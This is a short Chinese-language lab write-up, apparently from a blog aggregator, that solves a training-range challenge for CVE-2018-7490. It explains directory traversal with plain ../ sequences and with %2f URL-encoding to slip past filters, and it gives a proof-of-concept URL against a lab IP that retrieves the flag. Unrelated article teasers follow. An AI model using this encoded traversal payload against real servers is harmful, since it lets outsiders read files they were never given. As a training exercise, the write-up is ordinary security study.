1.阅读靶场介绍
思路就是目录遍历
两大角度解题
第一种就是直接../../../../去实现目录遍历
第二种就是/..%2f..%2f..%2f..%2f去编码绕过检测
2.启动靶场
如下图所示
这里提一嘴
能直接访问这种phpinfo是一个很严重的漏洞哟
因为这种界面有很多敏感信息
3.poc
构造如下的url
http://8.147.132.32:38529/..%2f..%2f..%2f..%2fflag
到此文章就结束了
感谢您宝贵的时间
news
2026/4/14 21:11:17
春秋云境CVE-2018-7490
张小明
前端开发工程师
1.2k
24
版权声明:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设
2026/4/14 21:09:26
Linux系统下BricsCAD:从零部署到高效运行的完整指南
1. Linux系统下为什么选择BricsCAD 对于长期使用Linux系统的工程师和设计师来说,处理DWG格式的CAD图纸一直是个头疼的问题。虽然市面上有不少CAD软件,但真正能在Linux环境下稳定运行且完美兼容DWG格式的却寥寥无几。这就是为什么BricsCAD会成为很多专业人…
李华
网站建设
2026/4/14 21:08:32
SmolVLA基础教程:numpy数组在state/action数据流转中的格式规范
SmolVLA基础教程:numpy数组在state/action数据流转中的格式规范 1. 引言 如果你正在尝试让机器人理解你说的话,并按照你的指令做出动作,那么SmolVLA可能就是你需要了解的工具。这是一个专门为机器人设计的视觉-语言-动作模型,简…
李华
网站建设
2026/4/14 21:07:46
Nano-Banana Studio工业应用案例:消费电子配件技术蓝图自动生成
Nano-Banana Studio工业应用案例:消费电子配件技术蓝图自动生成 1. 引言:从设计草图到专业蓝图的效率革命 想象一下这个场景:你是一家消费电子公司的产品设计师,刚刚完成了一款新无线耳机的内部结构设计。为了向工程团队和供应商…
李华
网站建设
2026/4/14 21:07:31
【稀缺首发】多模态持续学习3.0范式来了:基于神经符号记忆库+因果反事实重放的零样本泛化框架(已通过ICML 2024双盲评审)
第一章:多模态大模型持续学习机制的范式跃迁 2026奇点智能技术大会(https://ml-summit.org) 传统持续学习范式在多模态大模型场景中正遭遇根本性挑战:静态参数冻结导致视觉-语言对齐能力退化,任务增量引发灾难性遗忘,而跨模态知识…
)
李华
网站建设
2026/4/14 21:06:32
全球反井钻杆:稳增6.3%,2025年1.19亿,2032年剑指1.87亿
QYResearch调研显示,2025年全球反井钻杆市场规模大约为1.19亿美元,预计2032年将达到1.87亿美元,2026-2032期间年复合增长率(CAGR)为6.3%。地区市场分析:中国市场异军突起从地区层面深入剖析,中国…
李华
网站建设
2026/4/14 21:05:32
Rimworld Mod开发避坑指南:About.xml文件配置详解(从packageId到版本兼容)
Rimworld Mod开发避坑指南:About.xml文件配置详解 第一次打开About.xml文件时,那些看似简单的XML标签背后藏着无数可能让Mod崩溃的陷阱。作为Rimworld Mod开发的核心配置文件,About.xml的每个字段都直接影响着Mod的加载顺序、兼容性和稳定性。…
)
李华